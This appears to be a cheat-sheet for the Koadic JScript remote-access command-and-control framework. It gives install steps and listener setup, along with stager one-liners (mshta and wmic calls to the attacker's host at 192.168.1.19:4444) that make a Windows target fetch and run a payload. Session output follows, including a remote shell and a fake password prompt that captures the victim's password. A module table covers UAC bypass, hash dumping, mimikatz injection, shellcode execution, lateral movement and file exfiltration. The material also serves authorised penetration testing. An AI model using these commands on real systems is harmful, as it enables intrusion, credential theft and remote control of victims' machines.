Koadic C3 COM Command & Control - JScript RAT

Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.

Installation

git clone https://github.com/zerosum0x0/koadic
git submodule init
git submodule update
pip2.7 install -r requirements.txt --user
python2.7 koadic

Set a listener

use stager/js/mshta
set LHOST 192.168.1.19
set SRVPORT 4444
run

[>] mshta http://192.168.1.19:4444/6DX7f
use stager/js/wmic
set LHOST 192.168.1.19
set SRVPORT 4444
run

[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl"

Stagers

Stagers hook target zombies and allow you to use implants.

ModuleDescription
stager/js/mshtaserves payloads using MSHTA.exe HTML Applications
stager/js/regsvrserves payloads using regsvr32.exe COM+ scriptlets
stager/js/wmicserves payloads using WMIC XSL
stager/js/rundll32_jsserves payloads using rundll32.exe
stager/js/diskserves payloads using files on disk

List zombies and interact with them

(koadic: sta/js/wmic)$ zombies

        ID   IP              STATUS  LAST SEEN
        ---  ---------       ------- ------------
        0    192.168.1.30    Alive   2018-10-04 17:07:12

(koadic: sta/js/wmic)$ zombies 0
        ID:                     0
        Status:                 Alive
        First Seen:             2018-10-04 17:05:00
        Last Seen:              2018-10-04 17:14:42
        IP:                     192.168.1.30
        User:                   DESKTOP-68URA9U\CrashWin
        [...]
        Elevated:               No
        [...]

Interact with zombies zombie_id, get a shell with cmdshell zombie_id.

[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami
[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.
[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.
Result for `cd C:\Users\CrashWin & whoami`:
desktop-68ura9u\crashwin

Use an implant

Select an implant with use module, then fill the info with set INFO value, finally start the module with run.

(koadic: sta/js/mshta)$ use implant/phish/password_box
(koadic: imp/phi/password_box)$ set ZOMBIE 1
(koadic: imp/phi/password_box)$ run
Input contents:
MyStrongPassword123!

Implants

Implants start jobs on zombies.

ModuleDescription
implant/elevate/bypassuac_eventvwrUses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
implant/elevate/bypassuac_sdcltUses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
implant/fun/zombieMaxes volume and opens The Cranberries YouTube in a hidden window.
implant/fun/voicePlays a message over text-to-speech.
implant/gather/clipboardRetrieves the current content of the user clipboard.
implant/gather/enum_domain_infoRetrieve information about the Windows domain.
implant/gather/hashdump_samRetrieves hashed passwords from the SAM hive.
implant/gather/hashdump_dcDomain controller hashes from the NTDS.dit file.
implant/gather/user_hunterLocate users logged on to domain computers (using Dynamic Wrapper X).
implant/inject/mimikatz_dynwrapxInjects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
implant/inject/mimikatz_dotnet2jsInjects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
implant/inject/shellcode_excelRuns arbitrary shellcode payload (if Excel is installed).
implant/manage/enable_rdesktopEnables remote desktop on the target.
implant/manage/exec_cmdRun an arbitrary command on the target, and optionally receive the output.
implant/phishing/password_boxPrompt a user to enter their password.
implant/pivot/stage_wmiHook a zombie on another machine using WMI.
implant/pivot/exec_psexecRun a command on another machine using psexec from sysinternals.
implant/scan/tcpUses HTTP to scan open TCP ports on the target zombie LAN.
implant/utils/download_fileDownloads a file from the target zombie.
implant/utils/multi_moduleRun a number of implants in succession.
implant/utils/upload_fileUploads a file from the listening server to the target zombies.

References